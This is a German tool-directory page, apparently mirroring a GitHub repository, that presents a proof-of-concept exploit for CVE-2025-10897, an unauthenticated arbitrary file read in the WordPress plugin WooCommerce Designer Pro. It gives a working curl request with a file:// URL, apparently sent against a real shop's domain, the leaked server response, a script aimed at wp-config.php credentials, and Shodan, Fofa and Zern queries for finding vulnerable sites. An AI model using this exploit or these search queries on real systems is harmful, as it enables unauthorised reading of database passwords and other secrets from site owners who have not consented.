Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-10897 — WooCommerce Designer Pro <= 1.9.28 - Nicht authentifiziertes Lesen beliebiger Dateien | Kitploit
Tools/GitHubGitHub/error-inside/cve-2025-10897
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungWebsicherheitPenetrationstests
GitHuberror-inside/cve-2025-10897

CVE-2025-10897

WooCommerce Designer Pro <= 1.9.28 - Nicht authentifiziertes Lesen beliebiger Dateien

Repository anzeigen
3vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-10897

Python CVSS License Educational

WooCommerce ist ein Open-Source-E-Commerce-Plugin für WordPress, das Websites in Online-Shops verwandelt. WooCommerce Designer Pro ist ein WordPress-Plugin von JMA Plugins, das Kunden ermöglicht, Produkte direkt in WooCommerce-Shops zu designen und anzupassen.

WICHTIG: WooCommerce und WooCommerce Designer Pro sind vollständig verschiedene Produkte.

WooCommerce Designer Pro unterstützt die Erstellung von Visitenkarten, Postkarten, Flyern, Postern, T-Shirts, Aufklebern und anderen bedruckbaren Materialien mit Funktionen wie CMYK-Farbunterstützung, PDF-Erzeugung und einer canvasbasierten Designoberfläche. Das Plugin integriert sich in WooCommerce, um eine Echtzeit-Produktanpassung vor dem Kauf zu ermöglichen, was es für Online-Druckereien und Shops mit individuellen Merchandise-Artikeln geeignet macht.

CVE-2025-10897 ist ein nicht authentifiziertes beliebiges Dateilesen (Arbitrary File Read) in WooCommerce Designer Pro bis Version 1.9.28 (CWE-22). Ein Angreifer sendet mit und einer -URL, die auf Serverdateien wie oder zeigt. Das Plugin gibt den Dateiinhalt in der JSON-Antwort zurück. Dies kann Datenbankpasswörter und andere Geheimnisse aus ohne ein WordPress-Konto preisgeben.

POST /wp-admin/admin-ajax.php
action=wcdp_convert_resource_cmyk
file://
/etc/passwd
wp-config.php
wp-config.php

PoC

ANFRAGE

root@kitploit:~
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: */*' \
  -H 'Connection: close' \
  -d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'

ANTWORT

root@kitploit:~
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}

Base64-dekodierte Antwort:

root@kitploit:~
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"

ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01

Verwendung

root@kitploit:~
python CVE-2025-10897-X7.py

HINWEIS: Unser PoC-Skript versucht, die wp-config.php zu lesen, aber das Ziel könnte WordPress an einem anderen Ort als /var/www installiert haben.

Argumente zur Suche nach verwundbaren Servern

  • Zern : body:"wc-designer-pro"
  • Fofa : body="wc-designer-pro"
  • Shodan : http.body:"wc-designer-pro"

Ressourcen

  • OpenCVE - WooCommerce Designer Pro <= 1.9.28 Unauthenticated Arbitrary File Read
  • NIST - CVE-2025-10897 Detail
  • WooCommerce-Homepage
  • WooCommerce Designer Pro - Offizielle Entwickler-Website
  • WooCommerce Designer Pro - Offizieller Marktplatz
  • Nuclei-Template - CVE-2025-10897

Haftungsausschluss

Dieses Repository und seine Inhalte werden ausschließlich für legitime Sicherheitsforschung, autorisierte Penetrationstests, pädagogische Studien und defensive Zwecke bereitgestellt. Durch den Zugriff auf oder die Nutzung dieses Materials erkennen Sie die volle Verantwortung dafür an, dass Ihre Aktivitäten allen geltenden Gesetzen entsprechen und dass Sie eine ordnungsgemäße Genehmigung eingeholt haben, bevor Sie diese Techniken gegen ein System testen oder anwenden, das Ihnen nicht gehört.

Die Autoren und Betreuer dieses Projekts übernehmen keinerlei Haftung für Schäden, rechtliche Konsequenzen oder Missbrauch, die sich aus der Anwendung dieser Informationen ergeben. Jegliche Nutzung für unbefugten Zugriff, böswillige Aktivitäten oder illegale Zwecke ist ausdrücklich untersagt und wird nicht unterstützt.

Nutzen Sie es verantwortungsvoll. Bleiben Sie legal. Testen Sie nur, was Ihnen gehört oder wofür Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

Autoren

  • ErrorInside // SCT

Lizenz

SCT-PL

Tool herunterladen